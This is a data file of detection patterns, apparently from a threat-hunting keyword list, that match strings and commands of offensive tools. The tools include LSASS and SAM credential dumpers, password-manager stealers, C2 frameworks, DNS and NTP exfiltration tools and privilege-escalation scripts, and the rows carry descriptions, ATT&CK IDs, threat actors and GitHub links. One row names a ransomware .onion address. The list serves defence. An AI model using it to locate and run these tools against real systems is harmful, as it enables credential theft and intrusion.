"*submodules.pywerview.requester*",".{0,1000}submodules\.pywerview\.requester.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","60590"
"*Suborner.exe*",".{0,1000}Suborner\.exe.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","60591"
"*Suborner-master.zip*",".{0,1000}Suborner\-master\.zip.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","60592"
"*succesfully dumped SAM's hash.es to *",".{0,1000}succesfully\sdumped\sSAM\'s\shash\.es\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","60594"
"*succesfully dumped SAM's hash.es to *",".{0,1000}succesfully\sdumped\sSAM\'s\shash\.es\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","60595"
"*succesfully dumped WINHELLO pin.s to *",".{0,1000}succesfully\sdumped\sWINHELLO\spin\.s\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","60596"
"*Succesfully Mirrored to lsass.exe*",".{0,1000}Succesfully\sMirrored\sto\slsass\.exe.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#content","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","60597"
"*Success! DC can be fully compromised by a Zerologon attack*",".{0,1000}Success!\sDC\scan\sbe\sfully\scompromised\sby\sa\sZerologon\sattack.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#content","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","60598"
"*Successfully cloned GPO * from SYSVOL*",".{0,1000}Successfully\scloned\sGPO\s.{0,1000}\sfrom\sSYSVOL.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","60599"
"*Successfully connected to sliver listener*",".{0,1000}Successfully\sconnected\sto\ssliver\slistener.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","60600"
"*Successfully connected* spawning shell?*",".{0,1000}Successfully\sconnected.{0,1000}\sspawning\sshell\?.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","60601"
"*Successfully cracked account password*",".{0,1000}Successfully\scracked\saccount\spassword.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","#content","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","60602"
"*Successfully created dump of the forked process*",".{0,1000}Successfully\screated\sdump\sof\sthe\sforked\sprocess.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#content","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","60603"
"*Successfully deleted scheduled task *",".{0,1000}Successfully\sdeleted\sscheduled\stask\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","60604"
"*Successfully downloaded the LSASS dump into local file*",".{0,1000}Successfully\sdownloaded\sthe\sLSASS\sdump\sinto\slocal\sfile.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#content","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","60605"
"*Successfully dumped lsass process*",".{0,1000}Successfully\sdumped\slsass\sprocess.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#content","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","60606"
"*Successfully dumped SAM and SYSTEM*",".{0,1000}Successfully\sdumped\sSAM\sand\sSYSTEM.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","60607"
"*Successfully embedded EXE into GIF*",".{0,1000}Successfully\sembedded\sEXE\sinto\sGIF.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","60608"
"*Successfully embedded EXE into PNG*",".{0,1000}Successfully\sembedded\sEXE\sinto\sPNG.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","60609"
"*Successfully hijacked KeePassXC.exe*",".{0,1000}Successfully\shijacked\sKeePassXC\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60610"
"*Successfully installed wraith to run on startup *",".{0,1000}Successfully\sinstalled\swraith\sto\srun\son\sstartup\s.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","60611"
"*Successfully obfuscated file: *.py*",".{0,1000}Successfully\sobfuscated\sfile\:\s.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","60612"
"*Successfully poisonned consent.exe*",".{0,1000}Successfully\spoisonned\sconsent\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60613"
"*Successfully poisonned LogonUI.exe*",".{0,1000}Successfully\spoisonned\sLogonUI\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60614"
"*Successfully poisonned MobaXTerm*",".{0,1000}Successfully\spoisonned\sMobaXTerm.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60615"
"*Successfully poisonned mstsc.exe*",".{0,1000}Successfully\spoisonned\smstsc\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60616"
"*Successfully poisonned RDCMan.exe*",".{0,1000}Successfully\spoisonned\sRDCMan\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60617"
"*Sucessfully performed AppDomainInjection for KeePass*",".{0,1000}Sucessfully\sperformed\sAppDomainInjection\sfor\sKeePass.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","60618"
"*sudo ./dnsstager*",".{0,1000}sudo\s\.\/dnsstager.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","#linux","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","60619"
"*sudo ./recv -f *",".{0,1000}sudo\s\.\/recv\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","60620"
"*sudo ./startup.sh*",".{0,1000}sudo\s\.\/startup\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#linux","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","60621"
"*sudo ./teamserver *",".{0,1000}sudo\s\.\/teamserver\s.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","#linux","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","60622"
"*sudo bloodhound*",".{0,1000}sudo\sbloodhound.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","#linux","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","60626"
"*sudo iodine *",".{0,1000}sudo\siodine\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","60628"
"*sudo -l -U dnskire*",".{0,1000}sudo\s\-l\s\-U\sdnskire.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","60629"
"*sudo nps start*",".{0,1000}sudo\snps\sstart.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","60633"
"*sudo -nS id' && lse_sudo=true*",".{0,1000}sudo\s\-nS\sid\'\s\&\&\slse_sudo\=true.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","60634"
"*sudo nsenter -t 1 -m -u -i -n -p -- su -*",".{0,1000}sudo\snsenter\s\-t\s1\s\-m\s\-u\s\-i\s\-n\s\-p\s\-\-\ssu\s\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","60635"
"*sudo socat -v TCP-LISTEN:135*rogueOxidResolverPort*",".{0,1000}sudo\ssocat\s\-v\sTCP\-LISTEN\:135.{0,1000}rogueOxidResolverPort.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#linux","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","60638"
"*sudo tmux new -s icebreaker*",".{0,1000}sudo\stmux\snew\s\-s\sicebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","60641"
"*sudo_inject*",".{0,1000}sudo_inject.{0,1000}","offensive_tool_keyword","sudo_inject","Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token","T1055 - T1548.001 - T1059.002","TA0002 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/nongiach/sudo_inject","1","1","#linux","N/A","N/A","8","712","118","2019-04-14T07:43:35Z","2019-03-24T22:06:22Z","60642"
"*SUDO_KILLER*",".{0,1000}SUDO_KILLER.{0,1000}","offensive_tool_keyword","SUDO_KILLER","sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. System Auditors and trolls :).","T1078 - T1059 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/TH3xACE/SUDO_KILLER","1","1","#linux","N/A","N/A","10","2298","256","2024-12-28T21:52:09Z","2018-12-07T21:08:02Z","60643"
"*sudomy.git*",".{0,1000}sudomy\.git.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","60645"
"*sudopwn.c*",".{0,1000}sudopwn\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","60646"
"*SUID3NUM -*",".{0,1000}SUID3NUM\s\-.{0,1000}","offensive_tool_keyword","SUID3NUM","A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors! ( ?? ?? ??)","T1168 - T1553 - T1210 - T1059","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Anon-Exploiter/SUID3NUM","1","0","N/A","N/A","N/A","7","621","125","2021-08-15T20:37:50Z","2019-10-12T07:40:24Z","60647"
"*sullo/nikto*",".{0,1000}sullo\/nikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","60648"
"*SunloginClient_11.0.0.33162_X64.exe*",".{0,1000}SunloginClient_11\.0\.0\.33162_X64\.exe.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","N/A","5","484","195","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z","60649"
"*sunnyelf/cheetah/archive/master.zip*",".{0,1000}sunnyelf\/cheetah\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","60650"
"*sunnyelf[@hackfun.org]*",".{0,1000}sunnyelf\[\@hackfun\.org\].{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","60651"
"*superhedgy/AttackSurfaceMapper*",".{0,1000}superhedgy\/AttackSurfaceMapper.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","60652"
"*Supernova.exe -*",".{0,1000}Supernova\.exe\s\-.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","60653"
"*Supernova-main.zip*",".{0,1000}Supernova\-main\.zip.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","1","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","60654"
"*supershell*winpty.dll*",".{0,1000}supershell.{0,1000}winpty\.dll.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","60655"
"*supershell*winpty-agent.exe*",".{0,1000}supershell.{0,1000}winpty\-agent\.exe.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","60656"
"*supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion*",".{0,1000}supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","60657"
"*Supply either a 32-character RC4/NT hash or a 64-character AES256 hash*",".{0,1000}Supply\seither\sa\s32\-character\sRC4\/NT\shash\sor\sa\s64\-character\sAES256\shash.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60658"
"*surajpkhetani/AutoSmuggle*",".{0,1000}surajpkhetani\/AutoSmuggle.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","60676"
"*surfsharkvpnstealer*",".{0,1000}surfsharkvpnstealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","60677"
